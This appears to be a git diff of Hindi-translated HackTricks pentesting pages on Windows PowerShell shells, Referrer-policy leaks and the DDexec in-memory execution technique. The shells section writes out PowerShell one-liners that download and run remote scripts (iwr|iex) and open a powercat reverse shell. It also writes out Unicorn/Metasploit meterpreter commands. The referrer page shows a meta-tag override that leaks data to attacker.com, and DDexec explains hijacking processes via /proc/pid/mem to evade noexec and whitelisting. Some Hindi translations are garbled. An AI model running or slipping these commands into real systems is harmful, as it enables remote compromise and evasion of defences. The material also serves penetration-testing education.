एक पावरशेल लॉन्चर बनाएं, इसे एक फ़ाइल में सहेजें और उसे डाउनलोड और निष्पादित करें।
|
||||
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd"
|
||||
```
|
||||
|
||||
**कोई दुर्भाग्यपूर्ण कोड के रूप में पहचाना गया**
|
||||
|
||||
### MSF-Unicorn
|
||||
|
@ -523,28 +450,22 @@ powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c
|
|||
[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn)
|
||||
|
||||
यूनिकॉर्न का उपयोग करके मेटास्प्लॉइट बैकडोर का पावरशेल संस्करण बनाएं
|
||||
|
||||
```
|
||||
python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443
|
||||
```
|
||||
|
||||
बनाए गए संसाधन के साथ msfconsole शुरू करें:
|
||||
|
||||
```
|
||||
msfconsole -r unicorn.rc
|
||||
```
|
||||
|
||||
विक्टिम में निम्नलिखित को निष्पादित करें:
|
||||
|
||||
एक वेब सर्वर शुरू करें जो _powershell\_attack.txt_ फ़ाइल को सेव कर रहा है और पीड़ित पर निम्नलिखित को क्रियान्वित करें:
|
||||
```
|
||||
powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex"
|
||||
```
|
||||
|
||||
**मालिकाना कोड के रूप में पहचाना गया**
|
||||
**खतरनाक कोड के रूप में पहचाना गया**
|
||||
|
||||
## अधिक
|
||||
|
||||
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS कंसोल जिसमें कुछ आक्रामक PS मॉड्यूल पूर्वालोड हैं (साइफर्ड)\
|
||||
[PS>Attack](https://github.com/jaredhaight/PSAttack) PS कंसोल जिसमें कुछ आक्रामक PS मॉड्यूल पूर्व-लोड हैं (साइफर्ड)\
|
||||
[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\
|
||||
WinPWN](https://github.com/SecureThisShit/WinPwn) PS कंसोल जिसमें कुछ आक्रामक PS मॉड्यूल और प्रॉक्सी पहचान है (IEX)
|
||||
|
||||
|
@ -556,22 +477,25 @@ WinPWN](https://github.com/SecureThisShit/WinPwn) PS कंसोल जिस
|
|||
* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/)
|
||||
* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/)
|
||||
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
|
||||
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) **Try Hard Security Group**
|
||||
* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/)
|
||||
|
||||
**Try Hard Security Group**
|
||||
|
||||
<figure><img src="https://github.com/carlospolop/hacktricks/blob/in/generic-methodologies-and-resources/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
{% embed url="https://discord.gg/tryhardsecurity" %}
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* [**सदस्यता योजनाएँ**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
|
|
@ -1,29 +1,29 @@
|
|||
{% hint style="success" %}
|
||||
सीखें और प्रैक्टिस करें AWS हैकिंग: <img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
सीखें और प्रैक्टिस करें GCP हैकिंग: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **अपनी हैकिंग ट्रिक्स साझा करें, HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके.
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** और [**हैकट्रिक्स क्लाउड**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PRs सबमिट करके।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
# रेफरर हेडर्स और नीति
|
||||
|
||||
# Referrer headers और policy
|
||||
रेफरर वह हेडर है जिसका उपयोग ब्राउज़र्स द्वारा किया जाता है ताकि पहले दौरे गए पृष्ठ का पता लगाया जा सके।
|
||||
|
||||
Referrer वह header है जिसका उपयोग ब्राउज़र यह इंगित करने के लिए करते हैं कि पिछला पृष्ठ कौन सा था।
|
||||
## संवेदनशील जानकारी लीक हो गई
|
||||
|
||||
## संवेदनशील जानकारी का लीक होना
|
||||
यदि किसी वेब पृष्ठ के अंदर किसी GET अनुरोध पैरामीटर पर कोई संवेदनशील जानकारी होती है, यदि पृष्ठ में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर को यह सुझाने या बनाने में सक्षम होता है (सामाजिक इंजीनियरिंग) कि उपयोगकर्ता एक हमलावर द्वारा नियंत्रित URL पर जाएं। तो वह संवेदनशील जानकारी को नवीनतम GET अनुरोध के अंदर निकाल सकता है।
|
||||
|
||||
यदि किसी वेब पेज के अंदर किसी बिंदु पर कोई संवेदनशील जानकारी GET request पैरामीटर्स पर स्थित होती है, और यदि पेज में बाहरी स्रोतों के लिंक होते हैं या एक हमलावर उपयोगकर्ता को उस URL पर जाने के लिए मना सकता है (सामाजिक इंजीनियरिंग) जो हमलावर द्वारा नियंत्रित होता है। तो वह नवीनतम GET request के अंदर संवेदनशील जानकारी को बाहर निकालने में सक्षम हो सकता है।
|
||||
## संशोधन
|
||||
|
||||
## निवारण
|
||||
|
||||
आप ब्राउज़र को एक **Referrer-policy** का पालन करने के लिए बना सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशन्स को भेजे जाने से **रोक** सकता है:
|
||||
आप ब्राउज़र को एक **रेफरर-नीति** का पालन करने के लिए कर सकते हैं जो संवेदनशील जानकारी को अन्य वेब एप्लिकेशनों को भेजने से **बचा** सकता है।
|
||||
```
|
||||
Referrer-Policy: no-referrer
|
||||
Referrer-Policy: no-referrer-when-downgrade
|
||||
|
@ -34,28 +34,13 @@ Referrer-Policy: strict-origin
|
|||
Referrer-Policy: strict-origin-when-cross-origin
|
||||
Referrer-Policy: unsafe-url
|
||||
```
|
||||
## प्रतिरोध-निवारण
|
||||
## काउंटर-मिटिगेशन
|
||||
|
||||
आप इस नियम को एक HTML मेटा टैग का उपयोग करके ओवरराइड कर सकते हैं (हमलावर को HTML इंजेक्शन का शोषण करने की आवश्यकता है):
|
||||
आप एक HTML मेटा टैग का उपयोग करके इस नियम को नष्ट कर सकते हैं (हमलावर को HTML इन्जेक्शन का शिकार होना चाहिए):
|
||||
```markup
|
||||
<meta name="referrer" content="unsafe-url">
|
||||
<img src="https://attacker.com">
|
||||
```
|
||||
## रक्षा
|
||||
|
||||
URL में GET पैरामीटर्स या पथों के अंदर कभी भी संवेदनशील डेटा न रखें।
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong> AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह
|
||||
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** 🐦 पर **मुझे फॉलो** करें [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||||
* **HackTricks** के [**github repos**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके अपनी हैकिंग ट्रिक्स साझा करें।
|
||||
|
||||
</details>
|
||||
कभी भी URL में GET पैरामीटर या पथ में कोई भी संवेदनशील डेटा न डालें।
|
||||
|
|
|
@ -1,30 +1,31 @@
|
|||
# DDexec / EverythingExec
|
||||
|
||||
{% hint style="success" %}
|
||||
**AWS हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
|
||||
**GCP हैकिंग सीखें और प्रैक्टिस करें:** [**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें द्वारा PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
|
||||
|
||||
</details>
|
||||
{% endhint %}
|
||||
|
||||
## संदर्भ
|
||||
|
||||
Linux में किसी प्रोग्राम को चलाने के लिए यह एक फ़ाइल के रूप में मौजूद होना चाहिए, इसे किसी भी तरीके से फ़ाइल सिस्टम हाइरार्की के माध्यम से पहुंचना चाहिए (यह बस `execve()` कैसे काम करता है). यह फ़ाइल डिस्क पर हो सकती है या रैम में (tmpfs, memfd) लेकिन आपको एक फ़ाइलपथ की आवश्यकता है। यह बहुत आसान बना दिया है कि लिनक्स सिस्टम पर क्या चलाया जाता है, यह खतरों और हमले के उपकरणों को पहचानना आसान बनाता है या उन्हें किसी भी चीज़ को चलाने की कोशिश करने से रोकने के लिए (_जैसे_ अनधिकृत उपयोगकर्ताओं को कहीं भी निषेधित नहीं करने देना)।
|
||||
लिनक्स में किसी प्रोग्राम को चलाने के लिए यह एक फ़ाइल के रूप में मौजूद होना चाहिए, इसे किसी भी तरह से फ़ाइल सिस्टम हायरार्की के माध्यम से पहुंचना चाहिए (यह बस `execve()` कैसे काम करता है।) यह फ़ाइल डिस्क पर हो सकती है या रैम में (tmpfs, memfd) लेकिन आपको एक फ़ाइलपथ की आवश्यकता है। यह लिनक्स सिस्टम पर चलाने के लिए बहुत आसान बना दिया है, यह खतरों और हमले के उपकरणों को पहचानना आसान बनाता है या उन्हें किसी भी चीज़ को चलाने की कोशिश करने से रोकने के लिए (_जैसे_ अनधिकृत उपयोगकर्ताओं को कहीं भी निष्पादनीय फ़ाइलें रखने की अनुमति न देना।)
|
||||
|
||||
लेकिन यह तकनीक इस सभी को बदलने के लिए यहाँ है। यदि आप जिस प्रक्रिया को चाहते हैं उसे शुरू नहीं कर सकते हैं... **तो आप एक पहले से मौजूद प्रक्रिया को हाइजैक कर सकते हैं**।
|
||||
लेकिन यह तकनीक इस सभी को बदलने के लिए यहाँ है। यदि आप जिस प्रक्रिया को शुरू नहीं कर सकते हैं... **तो आप एक पहले से मौजूद प्रक्रिया को हाइजैक करें**।
|
||||
|
||||
यह तकनीक आपको **सामान्य सुरक्षा तकनीकों जैसे कि केवल पढ़ने योग्य, noexec, फ़ाइल-नाम सफेद सूची, हैश सफेद सूची...** को छूने की अनुमति देती है।
|
||||
यह तकनीक आपको **सामान्य सुरक्षा तकनीकों जैसे कि केवल पढ़ने योग्य, noexec, फ़ाइल-नाम व्हाइटलिस्टिंग, हैश व्हाइटलिस्टिंग...** को छेड़ने की अनुमति देती है।
|
||||
|
||||
## Dependencies
|
||||
## आवश्यकताएँ
|
||||
|
||||
अंतिम स्क्रिप्ट निम्नलिखित उपकरणों पर निर्भर करता है काम करने के लिए, वे आपके द्वारा हमला किए जा रहे सिस्टम में पहुंचने की आवश्यकता है (डिफ़ॉल्ट रूप से आप उन्हें हर जगह पाएंगे):
|
||||
अंतिम स्क्रिप्ट निम्नलिखित उपकरणों पर निर्भर करता है काम करने के लिए, वे उपकरण आपके द्वारा हमला किए जा रहे सिस्टम में पहुंचने की आवश्यकता है (डिफ़ॉल्ट रूप से आप उन्हें हर जगह पाएंगे):
|
||||
```
|
||||
dd
|
||||
bash | zsh | ash (busybox)
|
||||
|
@ -40,42 +41,42 @@ base64
|
|||
```
|
||||
## तकनीक
|
||||
|
||||
यदि आप किसी प्रक्रिया की मेमोरी को विचारशील रूप से संशोधित कर सकते हैं तो आप इसे अधिकार में ले सकते हैं। इसका उपयोग किसी पहले से मौजूद प्रक्रिया को हाइजैक करने और उसे दूसरे कार्यक्रम से बदलने के लिए किया जा सकता है। हम इसे या तो `ptrace()` सिस्टेम कॉल का उपयोग करके (जिसके लिए आपको सिस्टम पर सिस्टेम कॉल को निष्पादित करने की क्षमता होनी चाहिए या सिस्टम पर gdb उपलब्ध होना चाहिए) या, और भी दिलचस्पी से, `/proc/$pid/mem` में लिखकर प्राप्त कर सकते हैं।
|
||||
यदि आप किसी प्रक्रिया की मेमोरी को विचारशील रूप से संशोधित कर सकते हैं तो आप इसे अधिकार में ले सकते हैं। इसका उपयोग किसी पहले से मौजूदा प्रक्रिया को हाइजैक करने और उसे दूसरे कार्यक्रम से बदलने के लिए किया जा सकता है। हम इसे या तो `ptrace()` सिस्टेम कॉल का उपयोग करके (जिसके लिए आपको सिस्टम पर सिस्टम कॉल को निष्पादित करने की क्षमता होनी चाहिए या सिस्टम पर gdb उपलब्ध होना चाहिए) या, और भी दिलचस्पीपूर्ण रूप से, `/proc/$pid/mem` में लिखकर प्राप्त कर सकते हैं।
|
||||
|
||||
फ़ाइल `/proc/$pid/mem` एक प्रक्रिया के पूरे पता अंतरिक्ष का एक-से-एक मैपिंग है (_जैसे_ `0x0000000000000000` से `0x7ffffffffffff000` तक x86-64 में)। इसका अर्थ है कि इस फ़ाइल से किसी ऑफसेट `x` पर पढ़ना या लिखना उसी तरह है जैसे कि वर्चुअल पते `x` पर सामग्री को पढ़ना या संशोधित करना।
|
||||
|
||||
अब, हमें चार मूल समस्याओं का सामना करना होगा:
|
||||
अब, हमें चार मूल समस्याओं का सामना करना है:
|
||||
|
||||
* सामान्य रूप से, केवल रूट और फ़ाइल के कार्यक्रम मालिक इसे संशोधित कर सकते हैं।
|
||||
* ASLR।
|
||||
* यदि हम किसी प्रोग्राम के पते में मैप नहीं किए गए पते पर पढ़ने या लिखने की कोशिश करते हैं तो हमें एक I/O त्रुटि मिलेगी।
|
||||
* यदि हम किसी पते पर पढ़ने या लिखने की कोशिश करते हैं जो प्रोग्राम के पता अंतरिक्ष में मैप नहीं है तो हमें एक I/O त्रुटि मिलेगी।
|
||||
|
||||
इन समस्याओं के समाधान हैं जो, यद्यपि वे पूर्ण नहीं हैं, अच्छे हैं:
|
||||
इन समस्याओं के हल हैं जो, यद्यपि वे पूर्ण नहीं हैं, अच्छे हैं:
|
||||
|
||||
* अधिकांश शैल अनुवादकों को बच्चा प्रक्रियाओं द्वारा विरासत में लिए जाएंगे फ़ाइल डेस्क्रिप्टर्स का निर्माण करने की अनुमति देते हैं। हम एक फ़ाइल डेस्क्रिप्टर बना सकते हैं जो लिखने की अनुमति वाली शैल की `mem` फ़ाइल की ओर पॉइंट करता है... तो उन बच्चा प्रक्रियाएँ जो उस fd का उपयोग करती हैं वे शैल की मेमोरी को संशोधित कर सकेंगी।
|
||||
* ASLR एक समस्या ही नहीं है, हम शैल की `maps` फ़ाइल या प्रोसेस के पता अंतरिक्ष के बारे में जानकारी प्राप्त करने के लिए procfs से किसी भी अन्य को जांच सकते हैं।
|
||||
* इसलिए हमें फ़ाइल पर `lseek()` करने की आवश्यकता है। शैल से यह नहीं किया जा सकता अगर केवल दुर्भाग्यपूर्ण `dd` का उपयोग किया जाता है।
|
||||
* अधिकांश शैल अनुवादकों को फ़ाइल डिस्क्रिप्टर्स का निर्माण करने की अनुमति देते हैं जो फिर बच्चा प्रक्रियाओं द्वारा विरासत में लिया जाएगा। हम एक फ़ाइल डिस्क्रिप्टर बना सकते हैं जो लिखने की अनुमति वाली शैल की `mem` फ़ाइल की ओर पॉइंट करता है... तो उन बच्चा प्रक्रियाएँ जो उस फ़ाइल डिस्क्रिप्टर का उपयोग करती हैं वे शैल की मेमोरी को संशोधित कर सकेंगी।
|
||||
* ASLR एक समस्या भी नहीं है, हम शैल के `maps` फ़ाइल या प्रोसेस के पता अंतरिक्ष के बारे में जानकारी प्राप्त करने के लिए procfs से किसी भी अन्य को जांच सकते हैं।
|
||||
* इसलिए हमें फ़ाइल पर `lseek()` करने की आवश्यकता है। शैल से यह नहीं किया जा सकता अगर केवल दुर्भाग्यपूर्ण `dd` का उपयोग किया जाए।
|
||||
|
||||
### अधिक विस्तार में
|
||||
|
||||
चरण साधारण हैं और इन्हें समझने के लिए किसी भी प्रकार की विशेषज्ञता की आवश्यकता नहीं है:
|
||||
|
||||
* हमें वह बाइनरी जिसे हम चलाना चाहते हैं और लोडर का विश्लेषण करना होगा ताकि हम जान सकें कि वे कौन-कौन सी मैपिंग चाहते हैं। फिर एक "शैल"कोड बनाएं जो, सामान्य रूप से, `execve()` को हर कॉल पर कर्नल द्वारा किए जाने वाले विशेष कदमों को करेगा:
|
||||
* हमें वह बाइनरी जिसे हम चलाना चाहते हैं और लोडर को पार्स करना होगा ताकि हम जान सकें कि वे कौन-कौन सी मैपिंग चाहते हैं। फिर एक "शैल"कोड बनाएं जो, व्यापक रूप से, `execve()` को हर कॉल पर करने वाले कर्नेल के उसी कदमों को करेगा:
|
||||
* उक्त मैपिंग बनाएं।
|
||||
* उनमें बाइनरी डालें।
|
||||
* उन्हें मेमोरी में पढ़ें।
|
||||
* अनुमतियाँ सेट करें।
|
||||
* अंत में प्रोग्राम के लिए ताकत देने वाले तर्कों के साथ स्टैक को प्रारंभ करें और सहायक वेक्टर (लोडर द्वारा आवश्यक) रखें।
|
||||
* अंत में प्रोग्राम के लिए ताकत देने के लिए स्टैक को आरंभ करें और सहायक वेक्टर (लोडर द्वारा आवश्यक) को रखें।
|
||||
* लोडर में जाएं और उसे बाकी का काम करने दें (प्रोग्राम द्वारा आवश्यक पुस्तकालयों को लोड करना)।
|
||||
* `syscall` फ़ाइल से प्रक्रिया जिस पते पर वापस आएगी उसे प्राप्त करें जिसे वह वर्तमान में निष्पादित कर रही है।
|
||||
* उस स्थान को अधिकारी बनाएं, जो कार्यक्रम द्वारा निष्पादित होगा, हमारे शैलकोड से (द्वारा `mem` हम अनलिखनीय पृष्ठों को संशोधित कर सकते हैं)।
|
||||
* प्रोसेस के stdin में उस प्रोग्राम को पास करें जिसे हम चलाना चाहते हैं (उस "शैल"कोड द्वारा `read()` किया जाएगा)।
|
||||
* `syscall` फ़ाइल से प्राप्त करें कि प्रक्रिया जिस प्रक्रिया को वह सिस्टम कॉल निष्पादित कर रही है उसके बाद वापस लौटने का पता।
|
||||
* उस स्थान को ओवरराइट करें, जो कार्यात्मक होगा, हमारे शैलकोड के साथ (द्वारा `mem` हम अनलिखनीय पृष्ठों को संशोधित कर सकते हैं)।
|
||||
* प्रोसेस के stdin में चलाने के लिए हमारे पास जो प्रोग्राम है उसे पास करें (उस "शैल"कोड द्वारा `read()` किया जाएगा)।
|
||||
* इस बिंदु पर लोडर को हमारे प्रोग्राम के लिए आवश्यक पुस्तकालयों को लोड करने और उसमें जाने के लिए है।
|
||||
|
||||
**टूल की जाँच करें** [**https://github.com/arget13/DDexec**](https://github.com/arget13/DDexec)
|
||||
|
||||
## EverythingExec
|
||||
|
||||
`dd` के लिए केवल उद्देश्य के लिए उपयोग किए जाने वाले `lseek()` के लिए वर्तमान में डिफ़ॉल्ट कार्यक्रम हैं, उसके लिए `tail` जैसे कई विकल्प हैं जो `mem` फ़ाइल के माध्यम से `lseek()` करने के लिए उपयोग किए जाते हैं। उक्त विकल्प हैं:
|
||||
`dd` के लिए कई विकल्प हैं, जिनमें से एक, `tail`, वर्तमान मेम फ़ाइल के माध्यम से `lseek()` के लिए डिफ़ॉल्ट कार्यक्रम है (जिसका उपयोग करने के लिए `dd` का उपयोग किया जाता था)। उक्त विकल्प हैं:
|
||||
```bash
|
||||
tail
|
||||
hexdump
|
||||
|
@ -86,23 +87,24 @@ xxd
|
|||
```bash
|
||||
SEEKER=cmp bash ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
|
||||
```
|
||||
यदि आप स्क्रिप्ट में अन्य एक मान्य सीकर खोजते हैं जो कि अंमल में नहीं है, तो आप `SEEKER_ARGS` वेरिएबल को सेट करके इस्तेमाल कर सकते हैं:
|
||||
यदि आप स्क्रिप्ट में अन्य एक मान्य सीकर निर्मित नहीं करते हैं, तो आप इसे अभी भी उपयोग कर सकते हैं `SEEKER_ARGS` चर को सेट करके:
|
||||
```bash
|
||||
SEEKER=xxd SEEKER_ARGS='-s $offset' zsh ddexec.sh ls -l <<< $(base64 -w0 /bin/ls)
|
||||
```
|
||||
## संदर्भ
|
||||
* [https://github.com/arget13/DDexec](https://github.com/arget13/DDexec)
|
||||
|
||||
{% hint style="success" %}
|
||||
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||||
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
|
||||
<summary>हैकट्रिक्स का समर्थन करें</summary>
|
||||
|
||||
HackTricks का समर्थन करने के अन्य तरीके:
|
||||
|
||||
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)!
|
||||
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
|
||||
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
|
||||
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
|
||||
* **हैकिंग ट्रिक्स साझा करें** द्वारा PRs सबमिट करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
|
||||
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
|
||||
